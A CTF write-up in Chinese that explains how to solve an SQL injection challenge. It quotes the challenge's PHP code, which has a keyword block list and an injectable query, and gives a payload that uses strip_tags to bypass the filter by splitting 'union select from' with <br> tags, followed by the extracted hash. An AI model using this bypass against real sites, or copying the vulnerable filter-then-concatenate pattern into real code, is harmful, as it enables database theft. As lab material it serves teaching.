访问参数为:?id=x
查找表为key的数据表,id=1值hash字段值
以下是其中一段代码
//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
if (substr_count($id, $value) > 0)
{
exit('包含敏感关键字!'.$value);
}
}
//xss过滤
$id = strip_tags($id);
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
首先我们看到这道CTF题的时候 通过代码审计,我们可以知道它过滤了很多关键字,这样一来我们不知道怎么下手,但是它又给出了一段代码,这段代码如果你不注意的话就可能认为是多余的,但是它这段代码就是提示
我们通过百度查一下strip_tags()这个函数的作用
定义和用法
strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。
注释:该函数始终会剥离 HTML 注释。这点无法通过 allow 参数改变。
注释:该函数是二进制安全的。
语法 strip_tags(string,allow)
剥去字符串中的 HTML 标签,但允许使用 <b> 标签:
<?php
echo strip_tags("Hello <b><i>world!</i></b>","<b>");
?>
知道原理后,那么我们就可以直接构造payload了
构造如下http://103.238.227.13:10087/index.php?id=-1 un<br>ion sel<br>ect hash,1 fr<br>om `key`#
最后结果如下:
SQL注入测试
访问参数为:?id=x
查找表为key的数据表,id=1值hash字段值
以下为其中一段代码:
//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
if (substr_count($id, $value) > 0)
{
exit('包含敏感关键字!'.$value);
}
}
//xss过滤
$id = strip_tags($id);
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
当前结果:
id | c3d3c17b4ca7f791f85e#$1cc72af274af4adef |
title | 1 |